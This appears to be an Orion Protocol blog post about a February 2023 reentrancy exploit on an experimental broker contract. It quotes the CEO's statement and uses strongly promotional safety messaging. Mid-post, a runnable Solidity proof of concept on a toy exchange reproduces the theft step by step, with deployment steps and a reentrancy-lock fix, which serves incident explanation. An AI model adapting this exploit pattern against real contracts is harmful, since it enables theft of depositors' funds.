Kal Ali | February 3 2023
Orion’s industry-first liquidity aggregator was in the news yesterday after a vulnerability in one of the smart contracts used by Orion’s experimental private brokers was exploited. The bug is now fixed, and users have retained full access to their funds throughout.
User funds remain secure: because Orion is non-custodial, users keep their funds in their own wallets when connecting to Orion Terminal. Orion as an entity holds no user funds, unlike centralized exchanges, which store and control users’ digital assets.
Orion has maintained an exceptional security record since going live in 2021; the protocol has been audited by the security firm CertiK, which gave it a top security rating. Consistent with those audits, the status of each component is:
- Staking: secure
- Orion Pool: secure
- Bridge: secure
- Liquidity providers: secure
- Depositless trading: secure
If you are staking or using any of the areas above, all is well and you need to do nothing more.
The core areas of the protocol held up under the attack. The malicious actor targeted a new, experimental contract on the private broker side.
The bug has been reviewed and fixed, and the contract will undergo a detailed audit by external security firms, which we will publish; the same will apply to any future upgrade of the smart contract code, to match the security standard of the core protocol.
The attack went through the pool swap function, using a multi-hop swap between USDC, USDT and ATK, a malicious token deployed by the attacker. The ATK token contained a redefined transfer function, modified to call the exchange contract’s deposit function while the swap was still in progress, a reentrancy.
In the first hop of the swap (USDC/ATK), the ATK token’s transfer function was invoked, and it in turn called the exchange contract’s deposit function for the last token in the path, USDT.
That USDT deposit raised the exchange contract’s USDT balance by the deposited amount.
Under the contract logic in place at the time, this balance increase was added to the final amount credited to the attacker: they were credited with the swap output plus the deposited amount, rather than the swap output alone.
After the pool swap function completed, the attacker also withdrew the previously deposited tokens from the exchange contract, walking away with double their initial deposit.
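As an added illustration (hypothetical code written for this page, not Orion’s contracts), the Solidity PoC below models the flow just described: a minimal exchange that credits swap output from its raw USDT balance delta, an attacker-seeded 1:1 pool, and a malicious token whose transfer() re-enters deposit() mid-swap. All contract and function names (Exchange, Pool, ATK, payOut, collect, the guarded flag) are invented, the swap is reduced to a single ATK -> USDT hop, and the toy ERC-20 omits allowance checks. The guarded flag switches on the fix, a reentrancy lock on deposit, withdraw and swap, under which the re-entered deposit reverts.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical PoC, not Orion's code: an exchange that credits swap output from its raw
// USDT balance delta, a malicious token whose transfer() re-enters deposit() mid-swap,
// and a reentrancy lock (guarded = true) that stops it.

interface IERC20 {
    function transfer(address to, uint256 amt) external returns (bool);
    function transferFrom(address from, address to, uint256 amt) external returns (bool);
    function balanceOf(address who) external view returns (uint256);
}

// Toy ERC-20 standing in for USDT. Allowance checks are omitted to keep the PoC short.
contract Token is IERC20 {
    mapping(address => uint256) public override balanceOf;
    function mint(address to, uint256 amt) external { balanceOf[to] += amt; }
    function transfer(address to, uint256 amt) public virtual override returns (bool) {
        balanceOf[msg.sender] -= amt; balanceOf[to] += amt; return true;
    }
    function transferFrom(address from, address to, uint256 amt) external override returns (bool) {
        balanceOf[from] -= amt; balanceOf[to] += amt; return true;
    }
}

// Attacker-seeded 1:1 pool: tokenIn is pushed to it by transfer(), USDT is paid out on request.
contract Pool {
    IERC20 public immutable usdt;
    constructor(IERC20 _usdt) { usdt = _usdt; }
    function payOut(uint256 amt) external { usdt.transfer(msg.sender, amt); }
}

contract Exchange {
    mapping(address => mapping(address => uint256)) public credited; // user => token => internal balance
    IERC20 public immutable usdt;
    Pool public immutable pool;
    bool public immutable guarded; // false reproduces the bug, true applies the fix
    bool private locked;

    constructor(IERC20 _usdt, Pool _pool, bool _guarded) {
        usdt = _usdt; pool = _pool; guarded = _guarded;
    }

    modifier nonReentrant() {
        if (guarded) { require(!locked, "reentrant call"); locked = true; }
        _;
        locked = false;
    }

    function deposit(IERC20 token, uint256 amt) external nonReentrant {
        token.transferFrom(msg.sender, address(this), amt);
        credited[msg.sender][address(token)] += amt;
    }

    function withdraw(IERC20 token, uint256 amt) external nonReentrant {
        credited[msg.sender][address(token)] -= amt; // underflow reverts under 0.8 checked math
        token.transfer(msg.sender, amt);
    }

    // Swap tokenIn -> USDT. Output is measured as the raw USDT balance delta, so anything that
    // raises this contract's USDT balance while the swap is in flight is credited to the trader.
    function swap(IERC20 tokenIn, uint256 amtIn) external nonReentrant {
        uint256 before = usdt.balanceOf(address(this));
        tokenIn.transferFrom(msg.sender, address(this), amtIn);
        tokenIn.transfer(address(pool), amtIn); // attacker-controlled token code runs here
        pool.payOut(amtIn);
        credited[msg.sender][address(usdt)] += usdt.balanceOf(address(this)) - before;
    }
}

// The malicious token: transfer() re-enters Exchange.deposit() while the swap is mid-flight.
contract ATK is Token {
    Exchange public immutable ex;
    IERC20 public immutable usdt;
    uint256 public immutable bonus;
    address public immutable owner;

    constructor(Exchange _ex, IERC20 _usdt, uint256 _bonus) {
        ex = _ex; usdt = _usdt; bonus = _bonus; owner = msg.sender;
    }

    function transfer(address to, uint256 amt) public override returns (bool) {
        super.transfer(to, amt);
        if (msg.sender == address(ex)) ex.deposit(usdt, bonus); // reverts when Exchange is guarded
        return true;
    }

    // Pull back the USDT this contract deposited during the swap and hand it to the attacker.
    function collect() external { ex.withdraw(usdt, bonus); usdt.transfer(owner, bonus); }
}

// Attack sequence (amtIn = 100, bonus = 50; the exchange holds 50 USDT belonging to other users,
// the pool is seeded by the attacker with 100 USDT, the ATK contract is funded with 50 USDT):
//   1. attacker calls ex.swap(atk, 100): before = 50; ATK moves to the pool and ATK.transfer()
//      re-enters ex.deposit(usdt, 50), balance 50 -> 100; pool pays 100, balance -> 200;
//      delta 150 is credited to the attacker although the swap itself produced only 100.
//   2. attacker calls ex.withdraw(usdt, 150), then atk.collect() withdraws the 50 deposited in step 1.
//   Exchange USDT: 200 - 150 - 50 = 0. Attacker paid in 150, took out 200: the other users' 50 is gone.
// With guarded = true, the re-entered deposit() reverts with "reentrant call" and the whole swap fails.
```

Deploy the four contracts in Foundry or Remix with the numbers from the closing comment: with guarded = false the attacker ends up with 50 USDT more than they put in, taken from the other depositors; with guarded = true the swap reverts. The lock is the minimal fix; the stronger one is to stop deriving a trader’s credit from a raw balance delta when the path contains an attacker-supplied token, for example by having the pool return the exact amount it paid and crediting only that.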
Because of the immediate response to the vulnerability, the exploit was not repeated.
Orion responded quickly, taking measured steps to identify the issue and secure the affected contract.
Communication in Orion’s official Telegram channel was immediate, assuring the community that the team was aware of the situation and actively reviewing it.
While the team, with help from Chainalysis and PeckShield, investigated the issue, a follow-up statement was published only once the cause was understood; it came within a few hours, from Orion CEO Alexey Koloskov.
A Twitter Space with core team members followed within half an hour of Alexey’s statement, confirming that user funds were secure and the project was on solid footing.
Here is the account of yesterday via Alexey Koloskov’s Twitter:
“Orion Protocol has enabled CEX liquidity on-chain. This revolutionary technology is the future of DeFi, and we are developing new apps every quarter to maximize the utility of our powerful architecture. 2023 is a year for ripe harvests: what’s due brings ease of CEX trading available on-chain. DeFi for your neighbor is here.
The community has inquired about opening our lucrative broker network to the public for years (it has always been kept private, and funded by our own internal treasury). Although extremely profitable (with one of our many internal brokers generating over $1m in revenue over the course of the year), we chose to keep the broker network private & funded with our own company treasury until we are fully comfortable with releasing the public main net.
We do this for the safety of our community and for the integrity of our work.
We have reasons to believe that the issue was not a result of any shortcomings in our core protocol code, but rather might have been caused by a vulnerability in mixing third-party libraries in one of the smart contracts used by our experimental and private brokers.
This contract was not of significant importance to the public in the sense that it was mainly used by one of our experimental brokers, with our company treasury in the broker’s account balance.
Please rest assured that all users have always, and will always have full access to 100% of their funds.
Moving forward, any and all contracts will be developed in-house to eliminate any potential vulnerabilities from third-party libraries. Our focus is to fortify the Orion Protocol and make sure it remains robust.
Exclusively relying on internal development for our contracts will further minimize any potential exposure to hacks. It’s also important to note that Orion is a TVL light protocol that generates revenue through fees on volume with transient TVL.
This makes it one of the least exposed protocols to large-scale hacks, which is why we fill brokers with our internal funds - even our experimental brokers. In the event that issues occur, our protocol treasury is robust and can handle any incidents without affecting user funds.
We want to reassure our users that no user experienced any loss during this incident. The assets at risk were in internal brokers accounts run by ourselves, the Orion Team, to enable decentralized access to centralized liquidity.
Over the last few years, we have utilized our own funds to fund brokerage accounts. Our brokers use our proprietary Orion Brokerage Software and Orion smart contracts to allow users to trade at the best prices (from Binance, KuCoin, OKX and others) from the comfort of their wallet, without losing custody of their assets. Users’ funds always remain available via smart contracts.
Instead of relying on low-impact bounty programs, our own funds were used in our smart contracts as a way to attract Web3’s most sophisticated hackers. Of course, we always hoped that a vulnerability would not be found.
We have been investigating this very sophisticated attack from the minutes it occurred. We will not reopen the Deposit function until we feel confident that the bug has been fixed, which will only be after successfully passing new audits from leading audit firms.
As always, users can withdraw their funds from the Orion Exchange Contract. However, we have temporarily suspended deposits to this contract until we ensure the issue with the experimental broker is rectified. Staking and pools on Orion have not been affected.
Rest assured, users have always, and will always, have exposure to contracts that have been thoroughly battle-tested and deemed secure by our team. We take the security of our protocol and user funds very seriously and will continue to take all necessary measures to ensure their safety.
Orion’s liquidity aggregator technology is an industry first as it combines the top sources of centralized & decentralized liquidity into one decentralized place, with top security as an absolute priority.
Orion continues to make fine improvements every single day.
For open transparency, the Orion team will be holding a Twitter Space in the next hour to alleviate any concerns you may have and to assure you that a DeFi bump in the road only makes Orion stronger.
Tune in & ask your questions to the team.
ALL user funds are SAFE.”
Improvement is continuous, especially in the rapidly developing blockchain industry. Orion’s core protocol is secure, as CertiK’s audits have shown.
User funds are also safe.
Even with funds taken from the company treasury, a loss that could have wiped out a smaller project, Orion remains stable because of its financial and technological backing.
The lesson learned here leaves Orion better equipped to stay secure and resilient now and in the future.
The Orion team is placing strict emphasis on security, for both new and experimental contracts, and is reinforcing the protocol with third-party audits from reputable security firms. We won’t just tell you; we will show you.
Orion Protocol is the most advanced liquidity aggregator in the space. We continue to make outstanding and unique technology for your crypto trading journey by making centralized liquidity available to you in a decentralized way in one order book.